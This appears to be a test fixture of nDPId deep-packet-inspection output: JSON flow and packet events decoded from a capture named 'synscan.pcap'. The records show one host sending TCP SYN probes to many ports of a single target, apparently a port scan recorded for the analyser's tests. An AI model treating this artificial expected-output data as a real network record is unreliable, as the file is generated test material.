+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"synscan.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsnUIAACUGhjCsEAAIQA2GNIzTHCDdU4MZAAAAAGACCAAUbAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"synscan.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1187,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"synscan.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAs0jAAACkGTUKsEAAIQA2GNIzTBKPdU4MZAAAAAGACCAAr6QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"synscan.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"synscan.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsfmUAAC8Gmw2sEAAIQA2GNIzTDAXdU4MZAAAAAGACEAAchwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"synscan.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3826,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"synscan.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAs9zUAADUGHD2sEAAIQA2GNIzTDvLdU4MZAAAAAGACCAAhmgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":174,"source":"synscan.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8291,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"synscan.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsQXsAACUG4fesEAAIQA2GNIzTIGPdU4MZAAAAAGACCAAQKQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"synscan.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5959,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"synscan.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAs89cAACUGL5usEAAIQA2GNIzSF0fdUoMYAAAAAGACCAAZSAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"synscan.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":425,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"synscan.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsbN4AADkGopSsEAAIQA2GNIzSAandUoMYAAAAAGACCAAu5gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"synscan.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"synscan.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsGdAAADQG+qKsEAAIQA2GNIzSJRzdUoMYAAAAAGACBAAPcwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"synscan.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"synscan.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsTDsAADYGxjesEAAIQA2GNIzSNrDdUoMYAAAAAGACDAD13gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":179,"source":"synscan.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15660,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"synscan.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ98AACUGu5OsEAAIQA2GNIzSPSzdUoMYAAAAAGACCADzYgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"synscan.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13456,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"synscan.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsnPQAADQGd36sEAAIQA2GNIzSNJDdUoMYAAAAAGACBAD\/\/gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"synscan.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1073,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"synscan.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAs3OIAACsGQJCsEAAIQA2GNIzSBDHdUoMYAAAAAGACEAAkXgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"synscan.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"synscan.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsg4YAACoGmuysEAAIQA2GNIzSCDrdUoMYAAAAAGACDAAkVQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"synscan.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61532,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"synscan.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAs28kAACgGRKmsEAAIQA2GNIzS8FzdUoMYAAAAAGACBABEMgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"synscan.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":497,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"synscan.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsTfIAADkGwYCsEAAIQA2GNIzSAfHdUoMYAAAAAGACCAAungAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":185,"source":"synscan.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"synscan.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAs93kAACUGK\/msEAAIQA2GNIzSCzXdUoMYAAAAAGACCAAlWgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"synscan.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6669,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"synscan.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsrdMAACcGc5+sEAAIQA2GNIzSGg3dUoMYAAAAAGACEAAOggAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":187,"source":"synscan.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"synscan.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsbZcAADMGp9usEAAIQA2GNIzSBZndUoMYAAAAAGACEAAi9gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"synscan.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"synscan.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsF0kAACUGDCqsEAAIQA2GNIzSD6DdUoMYAAAAAGACCAAg7wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":189,"source":"synscan.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"synscan.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsM9YAADEG45ysEAAIQA2GNIzSBBPdUoMYAAAAAGACCAAsfAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":190,"source":"synscan.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9575,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"synscan.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsUkAAADMGwzKsEAAIQA2GNIzSJWfdUoMYAAAAAGACEAADKAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"synscan.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"synscan.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsUOAAAC8GyJKsEAAIQA2GNIzSgADdUoMYAAAAAGACEACojgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":192,"source":"synscan.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1641,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"synscan.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsD6cAADIGBsysEAAIQA2GNIzSBmndUoMYAAAAAGACDAAmJgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"synscan.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"synscan.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsxQcAADIGUWusEAAIQA2GNIzSFsHdUoMYAAAAAGACDAAVzgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":194,"source":"synscan.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"synscan.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsiBIAADgGiGCsEAAIQA2GNIzSJqrdUoMYAAAAAGACBAAN5QAAAgQFtA=="} 